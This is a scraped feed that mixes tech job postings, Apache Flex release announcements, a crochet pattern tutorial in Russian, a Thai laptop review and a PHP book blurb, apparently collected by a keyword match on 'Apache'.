<li>Responsible for implementing mobile applications</li><li>Developing the implementation code for mobile applications</li><li>Developing the unit testing code surrounding mobile applications</li><li>Working with the testing team to validate the applications</li><li>Participating in the mobile product team scrums</li><li>Working independently with limited supervision and with other department personnel</li></ul>
&nbsp;<br>JOB QUALIFICATION / REQUIREMENTS<br>&nbsp;<br><ul>
<li>B.S. in Computer Science or combination of relevant education and experience</li><li>1+ years of mobile app design and development</li><li>2+ years of Web 2.0 client-side and server-side design and development</li><li>Experience with:</li><li>Web (or mobile web) apps containing rich content and user interface components, using HTML5, CSS3, LESS, Javascript, and REST. </li><li>JavaScript libraries and frameworks for mobile web development (such as JQuery, Angular, Bootstrap), and ability to work with MV* patterns.</li><li>Touch interfaces, mobile gesture support, flexible CSS layout, security, and tight AJAX server integration (notifications, WebSockets, JSON).</li><li>Production release and SDLC for mobile apps (enterprise or Internet deployed) is preferred. </li></ul>
&nbsp;<br>Desirable:<br><ul>
<li>Knowledge of Angular (directives, services, modules, controllers)</li><li>Understanding of MV* patterns (not DOM manipulation, 2-way binding)</li><li>Knowledge of CSS3, and LESS (CSS pre-processor), TypeScript (a plus)</li><li>Web (or mobile web) development with: Angular, Bootstrap, NodeJS, REST/JSON</li><li>Object Oriented design patterns and refactoring</li><li>One or more of: C#, Java, C, C++, scripting languages such as: Perl, Python, Ruby</li><li>Experience in an Agile / Scrum environment or willingness to learn</li><li>Tools like: JIRA, Jenkins, Confluence, Apache/Tomcat a plus</li></ul>
&nbsp;<br>This Mobile Web UI Developer full time Job in Elk Grove, CA will not be open long so apply now for immediate consideration.<br>&nbsp;<br></span>
          Data Scientist   
Specializes in data science, analytics and architecture. Strong experience/knowledge on framing and conducting complex analyses and experiments using large volumes of complex (not always well-structured, highly variable) data. Ability to source, scrub, and join varied data sets from public, commercial, and proprietary sources and review relevant academic and industry research to identify useful algorithms, techniques, libraries, etc. Assists in efforts to centralize data collection and develop an analytics platform that drives data science and analytics capabilities. Deep domain experience in Apache Hadoop, data analysis, machine learning and scientific programming. Understands how to integrate multiple systems and data sets. Able to link and mash up distinctive data sets to discover new insights. Designing and developing statistical procedures and algorithms around data sources, recommending and building models for various data studies, data discovery and predictive analytics tasks, implementing any software required for accessing and handling data appropriately, working with developers to integrate and preprocess data for inputs into models and recommending tools and libraries for data science that are appropriate for the project Required Qualifications: 5-10 years of platform software development experience ? 3-5 years of experience with, understanding and knowledge of the Hadoop ecosystem and building analytic jobs in MapReduce, Pig, Hive, etc. ? 5 years of experience in SAS, R, Perl, Python, Java, or other languages appropriate for large scale analysis of numerical and textual data ? Experience developing static and interactive data visualizations. ? Strong knowledge of technical design and architecture principles. ? Creating large scale data processing systems. ? Driving design and code review process. ? Ability to develop and program databases, query databases and perform statistical analysis. ? Working with large scale warehouse and databases, sound knowledge of tuning and query processing. ? Excellent understanding of entire development process, including specification, documentation, quality assurance, debugging practices and source control systems. ? Ability to understand business issues as they impact the software development project. ? Solves complex, critical problems related to significant and unique issues. ? Ability to delve into large data sets to identify useful trends in business and develop methods to leverage that knowledge. ? Strong skills in predictive analytics, conceptual modeling, planning, statistics, visualization capabilities, identification of best data sources, hypothesis testing and data analysis. ? Familiar with disciplines such as natural language processing (the interactions between computers and humans) and machine learning (using computers to improve as well as develop algorithms). ? Writing data extraction, transformation, munging etc. algorithms. ? Developing end-to-end data flow from data consumption, organization and making it available via dashboard and/or APIs. ? Bachelor's degree in software engineering, computer science, information systems or equivalent. ? 5 years of related experience; 10 years of overall experience. ? Ability to perform activities, tasks and responsibilities described in the Position Description above. ? Demonstrated track record of architecting and delivering solutions with enterprise customers. ? Excellent people and communication skills. ? Processing complex, large scale data sets used for modeling, data mining, and research ? Designing and implementing statistical data quality procedures for new data sources ? Understanding the principles of experimental testing and design, including population selection and sampling ? Performing statistical analyses in tools such as SAS, SPSS, R or Weka ? Visualizing and reporting data findings creatively to provide insights to the organization ? Agile Methodology Experience ? Masters Degree or PhD We are an equal employment opportunity employer and will consider all qualified candidates without regard to disability or protected veteran status.
          Build Engineer (Systems Engineer)   
Adecco is looking for a Contract Build Engineer (Systems Engineer) for a large client located in Emeryville, CA. The position is expected to last approximately 9 months. See job description and requirements below:

Job Description

This is a junior level role w/min. 1 year experience.

The Build Engineer works closely with Development Architects/Engineers and Operations Release Engineers to Design, Develop, Implement and maintain a Continuous Integration Environment. Work with Development Teams in maintaining Debug and Release versions of the build scripts. Maintain a consistent overall build process between development and release engineers. Collaborate with Release Engineers in the building of Application Deployment Packages.
Manage the installation, implementation, and maintenance Build and Deployments tools to achieve a Continuous Delivery pipeline. Facilitate the communication between operations, network and development users in setup and configuration.
Provide documentation and guidance in proper use of Build and Deployment Tools.
Facilitate the user documentation of tools and solution implementation tasks such as install, configure and customization.

Job Requirements

Qualifications
? A degree in computer science, engineering, mathematics, physics, or equivalent

Desirable Skills
? Knowledge of software process models (e.g. CMMI)
? Experience with software change and configuration management (e.g. Mantis, Jira, Trac, Track+ and Telelogic)
? Experience with multiplatform operating systems, software and builds (e.g. Linux to Windows, 32 bit to 64 bit, Apache, Tomcat)
? Experience with continuous integration systems (e.g. Cruise Control, Team City, Bamboo and/or Team Foundation Server)
? Experience with agile software development (e.g. SCRUM, KANBAN)
? Experience with static and dynamic code analysis (e.g. NDepend, NCover, dotCover, and FxCop)
? Experience with virtual environments and virtual machines (e.g. VMware and Hyper-V)
? Working knowledge of Application Lifecycle Management tools and applications

Essential Skills
? Software implementation (i.e. Visual C# or Visual Basic)
? Software version control (i.e. Git, CVS, Subversion, or Visual SourceSafe)
? Scripting and automation (i.e. Powershell)
? Software testing using automated test frameworks (i.e. CppUnit, JUnit, NUnit or MbUnit)
? Minimum two (2) years of professional experience in a software company in a
technical capacity
? Minimum one (1) years of professional experience using Microsoft Enterprise .NET
technologies or Build and Release automation
Adecco is an equal opportunity employer. The Adecco Group is a Fortune Global 500 company and the global leader in HR services. Our group connects over 700,000 associates with our business clients each day through our 6,600 offices in over 70 countries and territories around the world. We offer employment opportunities at any stage in your Professional Career.
          Mobile Developer, San Francisco, CA   
<span>Mobile Developer<br>&nbsp;<br>Modis is currently speaking with Mobile Developers who are interested in a 6 month contract to start in San Francisco, CA<br>&nbsp;<br>If this role is for you please apply directly to this posting with your current WORD version resume and contact info. <br>&nbsp;<br>&bull; 5-10 years experience <br>&bull; Strong hands-on experience programming in Java, JEE, XML, HTML4/5, Ajax, Javascript, C# and/or other OOP languages<br>&bull; Experience in mobile web applications development on Android or iPad platform<br>&bull; Knowledge or experience with mobile application protocols and technologies such as LTE, GSM and CDMA Wireless devices <br>&bull; Strong understanding of standard software development life-cycle methodologies <br>&bull; Software development ability, experience, speed, and quality <br>&bull; Ability to work on an Agile development environment <br>&bull; Interface with different departments within the organization regarding new deployments<br>&bull; Excellent inter-personnel communication and teaming skills<br>&nbsp;<br>&bull; Experience in Spring MVC framework<br>&bull; Experience in developing rich UI using JQuery/GWT/any UI framework <br>&bull; Experience in developing template based UI <br>&bull; Experience in performance tuning the web application <br>&bull; Experience in development of complex multi-layer applications <br>&bull; Experience in working with high-available mission critical web application <br>&bull; Experience in profiling web application Experience in development of multi-threaded application in interfacing with other systems <br>&bull; Experience in XML and XSLT transformation <br>&nbsp;<br>&bull; Experience with Rational IDE tools like RSA and RAD Experience in PL/SQL is a plus <br>&bull; Current knowledge of and experience with application servers such as IBM Websphere and/or apache HTTP servers <br>&bull; Excellent object-oriented design &amp; programming skills, including strong working knowledge and experience in using UML and design patterns, refactoring <br>&bull; Experience with ACCURev version control systems is a plus <br>&bull; Expertise in architecting applications based on business requirements <br>&bull; Experience in development of call center web application is a plus <br>&nbsp;<br>&nbsp;<br>**If this role is for you please apply directly to this posting with your current Word version resume and contact info** <br>&nbsp;<br>&nbsp;<br>&nbsp;<br></span>
          Senior UI Engineer Job   
<span>Modis is in need of a talented Sr. UI Engineer for one of it&#39;s valued clients...<br>&nbsp;<br>Senior UI Engineer Job Details<br>&nbsp;<br>Everyone tries to live a healthier lifestyle around this time of year as New Year&rsquo;s resolutions and gym memberships flood everyone&rsquo;s minds. Tough to stick it out the whole way isn&rsquo;t it? Luckily companies like my client are hard at work in promoting healthy living and lifestyle altering programs that can truly make the difference in 2015 and beyond.<br>This company allows self-insured clients to save millions by providing innovative and consistent healthcare software support and through physical call center operations and creative software solutions. They have four development teams that they are growing over the next few months that pairs senior Java engineers working in conjunction with a UI developer. This will allow the technology group as a whole to work together more effectively and efficiently. Plus we all know you can&rsquo;t have enough sharp minds when you&#39;re supporting clientele with employee numbers hitting the tens of thousands.<br>My client has built a culture; this culture is one that is fast paced, innovative, and emphasizes creativity. If you are looking for something that is going to push you mentally, technically, and personally, this is the place you need to be.<br>Required Skills<br>&nbsp;<br>&middot; &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;Experience in engineering esthetically pleasing yet functional sites using OO JavaScript<br>&middot; &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;Angular.js, backbone.js, node.js, ember.js, coffeescript<br>&middot; &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;LESS/SASS Experience preferred<br>&middot; &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;Experience with Sencha, Jasmine, Chai, Mocha, Sinon a plus<br>&middot; &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;Exposure to JSON, AJAX, &amp; XML<br>Benefits<br>&nbsp;<br>Full health, dental, vision insurance options. Competitive stock and performance bonuses, work from home on Fridays, flex hours to alleviate the morning commute, 4 weeks PTO, high pace and high energy environment. Private office building that includes gym, cafeteria, and relaxation area.<br>Keyword Tags<br>&nbsp;<br>HTML, CSS, JavaScript, LESS, SASS, Grunt.js, angular.js, node.js, ember.js, batman.js, knockout.js, backbone.js, JavaScript MVC, Client-side JavaScript, Server-Side JavaScript, OOP, OO, Software Engineer, Senior Engineer, Senior Software Engineer, PHP, MySQL, LAMP, Linux, Apache, Zend, Symfony, cakePHP, Laravel, Yii, Phalcon, MySQL, QA, Automation, Automated Unit Testing, TDD, Git, SVN, Subversion, GitHub, Version Control, Stash, Beanstalk, Cucumber, Haml, Memcached, Object oriented Design, HTTP, Node, Play, Akka, Scala, UI, UX, AWS, Azure, Google, Google Analytics, NoSQL, DynamoDB, MongoDB, Couchbase, Elasticsearch, Redis, Riak, Star Schema Design, OLAP, ETL, BI technologies, Shell Scripting, Network protocols, RESTFUL web services, Java, SOAP, Websphere, Weblogic, Maven, SpringMVC, Spring, Hibernate, Java Beans, Java IDE, NetBeans, J2EE, Automation, Puppet, Ruby on Rails, Chef, Saltstack, GOF, Scrum, Agile, Python, Django, Engineer,<br></span>
          Sr Apps Developer   
Our Financial client located in the heart of Orange County is now seeking (2) Sr Apps Developers on an urgent basis.

Looking for an experienced .NET Developer who also has some familiarity with Java.

Requirements:

C#, ASP.NET, MVC
WCF Web Services, TFS, SQL Server
Apache MQ, JSON, Mulesoft ESB

Looking to interview and on-board immediately! We are an equal employment opportunity employer and will consider all qualified candidates without regard to disability or protected veteran status.
          Java Developer - Career Opportunity   
Well known Fortune 500 Conglomerate seeks Top Notch Java Developers.

Key Responsibilities:
Seeking Enterprise Technical Consultants with advanced skills in Java/J2EE.
Experience building software on Java / J2EE platform.
Object Oriented Programming experience in Java / J2EE.
Knowledge of MVC architecture patterns (MVVM knowledge is bonus).
Experience with Jenkins, Maven, Ant, Spring and Other Java Frameworks.
Experience with RESTful web-services, XML/JSON API - expanding our API offering by designing and developing new APIs.
Experience with Server-side Programming-Servlet, JSP.

Excellent Career Opportunity!
Excellent Location
Great Benefits!
Great Team Players!
Room for Advancement!
Immediate Hire!
Servlet containers like Apache Tomcat
Application Server: Websphere Application Server
Data layer: JDBC, Hibernate, MyBatis, JPA (Java Persistence API)
Experience developing in Eclipse IDE, Source Control ?SVN

At least 6 years of Java/J2EE development experience. Awareness of Agile methodology

We are an equal employment opportunity employer and will consider all qualified candidates without regard to disability or protected veteran status.
          Apache Flex 4.9.0 Released!   
The Apache Flex project has announced the release of Apache Flex 4.9.0.  See their blog post https://blogs.apache.org/flex/entry/apache_flex_4_9_0 As you can see, Apache is continuing to improve the Flex SDK.  
          Flash Builder 4.7 now shipping   
If you didn’t already catch the announcement as part of the Adobe Gaming Sneak Peek or the Game Developer Tools launch, Adobe Flash Builder 4.7 is now available.  With the 4.7 release, Flash Builder adds support for Apache Flex 4.8, … Continue reading
          Apache Flex now an official Apache project!   
As you may recall, Flex was donated to the Apache Software Foundation at the end of 2011.  According to Apache rules, we had to spend some time in “incubation” to ensure that an active community could carry Flex forward independent … Continue reading
          Flash Builder 4.7 Beta is Here!   
  We are excited to announce the availability of Flash Builder 4.7 beta. Flash Builder 4.7 adds support for Flash Player 11.4 and AIR 3.4, as well as support for the new Apache Flex 4.8 SDK. With full support to … Continue reading
          Flex trademark assigned to Apache Software Foundation   
Hi Everyone, In case you were wondering, the Flex trademark has been assigned to Apache as mentioned here: http://markmail.org/message/vkwfmjkdjzpxrkke.  As the email mentions, this is another step on the road to transitioning Flex to Apache as promised here http://www.adobe.com/devnet/flex/whitepapers/roadmap.html
          Apache Flex 4.8.0-incubating Released!   
Hey Everyone! The Apache Flex Podling (http://incubator.apache.org/flex) has announced that Apache Flex 4.8.0 has been released. This is a major milestone in the transition of Flex from Adobe to Apache. It represents pretty much the same code that was in … Continue reading
          Java Developer - Career Opportunity   
Well known Fortune 500 Conglomerate seeks Top Notch Java Developers.

Key Responsibilities:
Seeking Enterprise Technical Consultants with advanced skills in Java/J2EE.
Experience building software on Java / J2EE platform.
Object Oriented Programming experience in Java / J2EE.
Knowledge of MVC architecture patterns (MVVM knowledge is bonus).
Experience with Jenkins, Maven, Ant, Spring and Other Java Frameworks.
Experience with RESTful web-services, XML/JSON API - expanding our API offering by designing and developing new APIs.
Experience with Server-side Programming-Servlet, JSP.

Excellent Career Opportunity!
Excellent Location
Great Benefits!
Great Team Players!
Room for Advancement!
Immediate Hire!
Servlet containers like Apache Tomcat
Application Server: Websphere Application Server
Data layer: JDBC, Hibernate, MyBatis, JPA (Java Persistence API)
Experience developing in Eclipse IDE, Source Control ?SVN

At least 6 years of Java/J2EE development experience. Awareness of Agile methodology

We are an equal employment opportunity employer and will consider all qualified candidates without regard to disability or protected veteran status.
          Implementing Content Based Routing With Apache Camel   

1.0 Overview

Content Based Routing (CBR)'s Enterprise Integration Patterns allows you to route a message to the correct destination depending on the message or its content. It is one of the most important and widely used integration patterns; for example, you have received a new purchase order and it needs to route to Widget or Gadget Inventory depending on message or its content.

Image title2.0 Camel DSL for Content Based Routing

Camel DSL typically looks as shown below:


          Sr. Web Developer   
<span><span style="color:#000000;background-color:transparent;font-family:Times New Roman;font-size:12pt;font-weight:normal;font-style:normal;">Sr. Web Developer job available in Oak Creek, WI<br>&nbsp;<br>A nationally recognized and highly respected client of ours is seeking a Sr. Web Developer for direct hire/permanent placement. As a Sr. Web Developer, the position involves working in the UI, core app, and database areas. The project will be developing the application via web, with future plans that it will be automated, and eventually making it to mobile for the next phase. At this time our client is seeking W2 candidates and not seeking candidates requiring sponsorship or working corp-corp.<br>&nbsp;<br>POSITION SUMMARY <br>Designs and develops web applications and associated web services in support of our client&rsquo;s Remote Electronic Access Control solutions. The position involves working in the UI, core app, and database areas. <br>&nbsp;<br>ESSENTIAL DUTIES AND RESPONSIBILITIES include (but not limited to) the following:<br>&bull;Analyzes software requirements to determine feasibility of design within time and cost constraints.<br>&bull;Designs formal software requirements from customer/market level requirements<br>&bull;Consults with hardware engineers and other engineering staff to evaluate/develop interfaces between hardware and software<br>&bull;Designs software within operational and performance requirements of overall system<br>&bull;Responsible for reviews of all software project phases (Development requirements, Test requirements, Code)<br>&bull;Understands how to insert new code into software build and follows proper procedures<br>&bull;Works with Software Testing to resolve issues to ensure testing can continue<br>&nbsp;<br>PREFERRED QUALIFICATIONS <br>&bull;A solid understanding of networking/distributed computing environment concepts<br>&bull;Experience in web design, API and web services development<br>&bull;Solid understanding of the principles of routing, client/server programming<br>&bull;As new technologies emerge and impact our systems, expected to learn new technologies and resolve any problems involved in integrating new technologies with our systems<br>&bull;Expert knowledge of software engineering design methods and techniques, specifically Agile development methodology<br>&bull;Experience and knowledge with .NET Framework and Visual Studio<br>&bull;Experience and knowledge of maintaining and debugging live software systems<br>&bull;Ability to determine whether a particular problem is caused by hardware, operating systems software, application programs, or network failures<br>&bull;Able to look at a problem and develop multiple solution approaches<br>&bull;Possess excellent written and verbal communication skills<br>&bull;Working knowledge of security and encryption &ndash; preferable but not mandatory<br>&nbsp;<br>EDUCATION<br>Bachelor&#39;s degree in Software/Computer Engineering discipline from four-year college or university, plus 5 &ndash; 10 years related experience.<br>&nbsp;<br>TECHNICAL REQUIREMENTS<br>&bull;C#, Javascript, Angular.js, CSS, MVC, AJAX, HTLML5, XML, HTML, SQL 2008/2012, Cassandra, MongoDb, Linux, Flash, Apache Tomcat, Windows Server 2008, ASP.NET<br>*Must Have Technical Requirements: &nbsp;Strong Angular.JS experience, C#.Net, Web Development, and Web Services experience<br>&nbsp;<br>This opportunity will not last long.<br>Our client is looking to move quickly to fill this role.<br>To be considered, you must apply online now with your resume.<br>We are actively monitoring all of those that apply.<br>Apply below, and thank you for partnering with Modis! <br>&nbsp;<br>&nbsp;<br></span><br></span>
          ИНТЕРЕСНАЯ ТЕХНИКА ВЯЗАНИЯ БАРДЖЕЛЛО   

Это цитата сообщения галина5819 Оригинальное сообщениеИНТЕРЕСНАЯ ТЕХНИКА ВЯЗАНИЯ БАРДЖЕЛЛО. УЗОР КРЮЧКОМ «СЛЕЗЫ АПАЧИ»

У вышивальщиц все большую популярность набирает вышивка в технике барджелло (флорентийская). Ну, а мы, вязальщицы?!!! Мы тоже не отстанем. Не хотите ли попробовать вязание крючком, имитирующее вышивку барджелло. Посмотрите на фото:

Мастер-класс и детальное описание вязания крючком узора "слезы апачи"

Ну чем не барджелло? Нет предела в искусстве вязания крючком! Я теперь буду коллекционировать подобные узоры и публиковать их на сайте. Подписывайтесь на рассылку и следите за новостями сайта!

Благодаря ИРИМЕД, это она перевела для нас мастер-класс по вязанию крючком узора «Слезы апачи», мы тоже можем освоить эту интересную технику вязания.

Автор этого пледа SARAH LONDON назвала его "Apache Tears", что означает "слезы апачи", видимо слезы радости.

Ниже смотрите мастер-класс на видео, а пока теория.

Основные "правила" выполнения узора:

  • Каждый ряд начинается с правой стороны и вяжется справа налево. Обязательно оставляйте в начале и конце каждого ряда "хвостик" длиной 15 см.
  • Начинайте каждый ряд с глухой петли (см. видео ниже).
  • Все столбики с ОДНИМ накидом провязывайте за дальнюю сторону петли.
  • Все столбики с ТРЕМЯ накидами (см. видео ниже) провязывайте за ближнюю часть петли на три ряда ниже.

Узор можно легко видоизменять, выбирая разную «базу»: 8 столбиков с накидом, 6 или 4.

Давайте рассмотрим пример вязания этого узора:

Интересная техника вязания Барджелло. Узор крючком «Слезы апачи»

Узор"слезы апачи". "База"- 8 столбиков с накидом.

Начинаем нитью красного цвета, провязываем цепочку из 37 петель.
1-й ряд: провязываем столбик с накидом во вторую петлю от крючка, а дальше ст. с накидом в каждую петлю до конца цепочки. Нить закрепить.

2-й ряд: столбик с накидом в каждую петлю предыдущего рада. Нить закрепить.

3-й ряд, 4-й и 5-й: как второй.

6 ряд: провязываем столбик с тремя накидами за ближгюю часть петли, расположенной на 3 ряда ниже, затем 8 ст.с накидом, снова столбик с тремя накидами в петлю на 3 ряда ниже. Продолжаем чередовать 8 ст.с накидом с 1 ст. с тремя накидами в петлю на три ряда ниже, заканчиваем ряд 8-мью ст.с накидом. Нить закрепляем.

7-й ряд: нить, синего цвета, 1 ст.с накидом, 1 ст.с тремя накидами в петлю на 3 ряда ниже, 8 ст. с накидом. Чередцем эти столбики, как в предыдущем ряду. Заканчиваем ряд 7-ю ст. с накидом. Нить закрепляем.

8-й ряд: нить сиреневого цвета, 1 ст.с тремя накидами в петлю на 3 ряда ниже, 8 ст.с накидом. Продолжаем чередовать стобики и заканчиваем ряд 6-ю ст.c накидом. Нить закрепляем.

9-й ряд: нить светло-голубого цвета, 4 ст. с накидом, 1 ст. с трнмя накидами в петлю на 3 ряда ниже, 8 ст. с накидом. Чередуем столбики так же, как в предыдущих рядах. Заканчиваем ряд 5-ю ст. с накидом. Нить закрепляем.

10-й ряд: нить светло-розового цвета, 4 ст. с накидом, 1 ст. с накидом в петлю на 3 ряда ниже, 8 ст.с накидом. Чередуем столбики, ряд заканчиваем 4-мя ст.с накидами. Нить закрепляем.

11-й ряд: нить желтого цвета, 5 ст. с накидом, 1 ст. с накидом в петлю на 3 ряда ниже, 8 ст.с накидом. Чередуем столбики, ряд заканчиваем 3-мя ст.с накидом.

12-й ряд: нить зеленого цвета, 6 ст.с накидом, 1 ст. с накидом в петлю на 3 ряда ниже, 8 ст.с накидом. Чередуем столбики, ряд заканчиваем 2-тя ст. с накидом. Нить закрепляем.

13-й ряд: нить ярко-розового (цыкламен) цвета, 7 ст. с накидом, 1 ст. с тремя накидами петлю на 3 ряда ниже, 8 ст. с накидом. Чередуем столбики, как и в предыдущих рядах, заканчиваем ряд 1 ст. с накидом. Нить закрепляем.

14-й ряд: нить оранжевого цвета, 8 ст.с накидом, 1 ст. с тремя накидали в петлю на 3ряда ниже, 8 ст. с накидом. Чередуем столбики, как н раньше, ряд заканчиваем столбиком с тремя накидами в люпет на 3 ряда ниже. Нить закрепляем.

Повторяем ряды с 6 – 14.

Заканчиваем шестью рядами столбиков с накидом нитью красного цвета, нить закрепляем.

Интересная техника вязания Барджелло. Узор крючком «Слезы апачи»

Вариант узора на 6-ти столбиках с накидом.

Интересная техника вязания Барджелло. Узор крючком «Слезы апачи»

Вариант узора на 4-х столбиках с накидом.

pled-radost-3



источник


          MSI GE72MVR 7RG Apache Pro Review   
สวัสดีครับ พบกับรีวิวโน๊ตบุ๊คกันอีกครั้งครับ โน๊ตบุ๊คตัวนี้เป็นรุ่นที่น่าสนใจมากตัวนึงที่เป็นโน๊ตบุ๊คเกมส์มิ่งที่มีขนาดหน้าจอค่อนข้างใหญ่ ผิวสัมผัสดี คุณภาพของการผลิตดี ประสิทธิภาพสูง ครับเรากำลังพูดถึง MSI GE72MVR 7RG Apache Pro สเปกและความแรงจะเป็นอย่างไรตามมาเลยครับ …. สำหรับรายละเอียดของอุปกรณ์ภายในนั้นก็จะมีดังนี้ Latest 7th Gen. Intel® Core™ i7 7700HQ 4 core 8 Threads, L3 6 MB 17.3″ Full HD (1920×1080) IPS-Level GeForce® GTX 1070 82GB GDDR5 HDD SATA III 1.0 TB DDR4 8 GB Single Channel USB3.0 Type-C reversible plug Nahimic 2 Sound Technology delivering 360⁰ immersive audio [...]
          Mastering PHP 7   

Effective, readable, and robust codes in PHP About This Book Leverage the newest tools available in PHP 7 to build scalable applications Embrace serverless architecture and the reactive programming paradigm, which are the latest additions to the PHP ecosystem Explore dependency injection and implement design patterns to write elegant code Who This Book Is For This book is for intermediate level developers who want to become a master of PHP. Basic knowledge of PHP is required across areas such as basic syntax, types, variables, constants, expressions, operators, control structures, and functions. What You Will Learn Grasp the current state of PHP language and the PHP standards Effectively implement logging and error handling during development Build services through SOAP and REST and Apache Trift Get to know the benefits of serverless architecture Understand the basic principles of reactive programming to write asynchronous code Practically implement several important design patterns Write efficient code by executing dependency injection See the working of all magic methods Handle the command-line area tools and processes Control the development process with proper debugging and profiling In Detail PHP is a server-side scripting language that is widely used for web development. With this book, you will get a deep understanding of the advanced programming concepts in PHP and how to apply it practically The book starts by unveiling the new features of PHP 7 and walks you through several important standards set by PHP Framework Interop Group (PHP-FIG). You’ll see, in detail, the working of all magic methods, and the importance of effective PHP OOP concepts, which will enable you to write effective PHP code. You will find out how to implement design patterns and resolve dependencies to make your code base more elegant and readable. You will also build web services alongside microservices architecture, interact with databases, and work around third-party packages to enrich applications. This book delves into the details of PHP performance optimization. You will learn about serverless architecture and the reactive programming paradigm that found its way in the PHP ecosystem. The book also explores the best ways of testing your code, debugging, tracing, profiling, and deploying your PHP application. By the end of the book, you will be able to create readable, reliable, and robust applications in PHP to meet modern day requirements in the software industry. Style and approach This is a comprehensive, step-by-step practical guide to developing scalable applications using PHP 7.1 Downloading the example code for this book. You can download the example code files for all Packt books you have purchased from your account at http://www.PacktPub.com . If you purchased this book elsewhere, you can visit http://www.PacktPub.com/support and register to have the code file.


          Big Data Developer - Verizon - Burlington, MA   
Experience with one of Storm or Apache Spark Experience with NOSQL databases ( Preferably Mongo DB or Cassandra) Ability to adapt and learn quickly in fast...
From Verizon - Thu, 29 Jun 2017 10:58:16 GMT - View all Burlington, MA jobs
          Raytheon lắp hệ thống laser năng lượng cao trên AH-64 Apache và hạ thành công mục tiêu từ xa   
Raytheon - nhà thầu quốc phòng lớn của Mỹ, đi đầu về vũ khí laser hủy diệt đã vừa thử nghiêm thành công hệ thống laser năng lượng cao lắp trên một chiếc trực thăng tấn công AH-64 Apache. Raytheon cho biết thử nghiệm này được thực hiện hồi tháng 4 tại khu vực thử nghiệm quân sự White Sands Missle Range (WSMR), bang New Mexico dưới sự giám sát của Đơn vị quản lý chương trình Apache và Bộ tư lệnh tác chiến đặc biệt thuộc lục quân Hoa Kỳ. Tại đây hệ thống laser lắp trên Apache đã khóa và bắn hạ thành công một mục tiêu không người lái.

Trước đây các hệ thống laser năng lượng cao do Mỹ chế tạo đã được thử nghiệm trên nhiều nền tảng khác nhau, chẳng hạn như hệ thống vũ khí laser (LaWS) của phòng nghiên cứu hải quân (ONR) đã được triển khai thành công trên tàu khu trục USS Ponce và mới nhất là tàu tàng hình USS...
          Cloud Security DevOps Engineer - Verizon - Basking Ridge, NJ   
AWS,Apache , Redis , MySQL &amp; Postgres , MongoDB , Ansible , Splunk , Github , Jenkins , and JIRA &amp; Confluence....
From Verizon - Thu, 29 Jun 2017 10:58:12 GMT - View all Basking Ridge, NJ jobs
          Laser Apache helicopter tested for the first time   
This week the US military released footage of an Apache AH-64 attack helicopter armed with a weaponised version of the Multi-Spectral Targeting System laser conducting fire tests. Unlike current generation laser range-finders, this modified...
          (USA-FL-Boca Raton) EAI Engineer Lead   
Responsibilities: The Enterprise Application Integration (EAI) group is responsible for leading, delivering, and supporting enterprise integration solutions for Office Depot. The EAI Engineer Lead is accountable for middleware component and infrastructure management practices, processes, and procedures and will identify efficiency and effectiveness levers that support, continuously improve, and coordinate architecture/solutioning, project delivery and leadership, and operations/support functions. This role will lead process improvement, analysis, planning, documentation, metrics, asset development, training, communication, and execution associated to all aspects of infrastructure and operational management. This person will demonstrate independent thinking and activities management, with ability to direct and influence practices, processes, and procedures in a coherent and consistent fashion, complementing EAI strategy and objectives. SUMMARY OF RESPONSIBLITIES: + Develop, manage, and ensure realization of tactical and strategic operations plans for the EAI Group + Develop, implement, and measure application and infrastructure processes, policies, methodologies, templates, standards, and procedures to meet goals for quality, time-to-market, and ROI/TCO + Participant and drive SDLC checkpoint reviews (peer, design, standards, etc.) for internal and external projects + Define and implement manual and automated practices related to implementation and support for EAI component + Provide quantitative and qualitative insights on progress and challenges on a periodic and ad hoc basis + Research and propose innovative methods to improve operations and support performance; provide thought and consultative leadership + Lead internal/external audit requests + Develops and maintains training plans for engineering and support practices + Lead engineering architecture planning and design for all related components + Evaluate project proposals and effort estimate to implement + Installation and configuration for environment builds including post build expansion + Product patching and analysis for implementation + Capacity planning and scaling analysis for all components + Create and maintain documentation as needed for future reference, knowledge transfer, and support turnover + Performance monitoring and identification of related issues + Manage engineering service requests and defects + Support code migration, automation and troubleshooting + Engage with other IT tech teams and request systems for troubleshooting or infrastructure dependencies related to project task completion + Provide guidance for support teams as relates to their assigned tasks + Initiate, coordinate, communicate and drive production changes via formal change management system + Take ownership of assignments, including vendor initiation and requests and drive them to conclusion + Implement monitoring and automation solutions as needed for existing or new components, Dynatrace experience is a plus. + Participate in 7x24 on-call rotation support for production + Assists with additional duties and responsibilities as assigned Qualifications: + Bachelor of Science in Computer Science, Information Systems, or equivalent. + Minimum of 6+ years of overall experience in information systems, including Java/J2EE development. + 3+ years of experience in application integration development and support of multi-platform technical environments within the integration/middleware space with products such as RedHat, Tibco, WebMethods or Oracle Fusion. + 2+ years of experience in conducting quality assurance practices, including testing, metrics definition, process development and improvement. + Strong self-management skills with ability to effectively collaborate with peers and senior management. + Prior technical leadership experience in an engineering capacity working on multiple infrastructure environments and projects. + Good understanding of IS/IT concepts across a broad spectrum which includes: application development, service-oriented architecture, and application integration. + Solid experience with automation frameworks, scripting languages, and test tools, including SoapUI, HP UFT/QTP, Selenium or similar. + Understanding of Software Quality Testing Approaches & Concepts - (e.g. API testing, test approach selection, Black, Grey, White Box test approaches, etc.). + Knowledge and experience with various test types - unit tests, volume tests, compatibility tests, integration tests, web-stress tests, system tests, etc. + Experience with the design & development of automation frameworks (including commercial automation testing tools, open source tools & scripting languages). + Experience with non-functional testing approaches (performance, security, accessibility, internationalization, etc) preferred. + Experience in EAI architecture and solutioning, application security, and project delivery. + Strong verbal and written communication skills to provide reports and documentation (e.g. test reports, test strategies, test plans, test cases, test reports, and bug tracking tools). + Strong knowledge of the basic principles, processes, phases and roles of application development methodologies (SDLC). + High proficiency in the use of quality management methods, tools, and technology used to create and support defect-free application software that meets the needs of the business partner. Other Information: + Strong knowledge with implementation and administration with RedHat Fuse/Apache Camel, Oracle SOASuite 11g & OSB 11g is a plus. + Implementation and configuration experience with integration adapters, such as with RedHat Fuse or Oracle Fusion adapters (Apps, DB, MQ, JMS, File, FTP, etc.). + Linux, Unix, Windows Server; AS400, z/OS is a plus. + Scripting knowledge (WLST, ANT) + Strong knowledge and experience with JVM 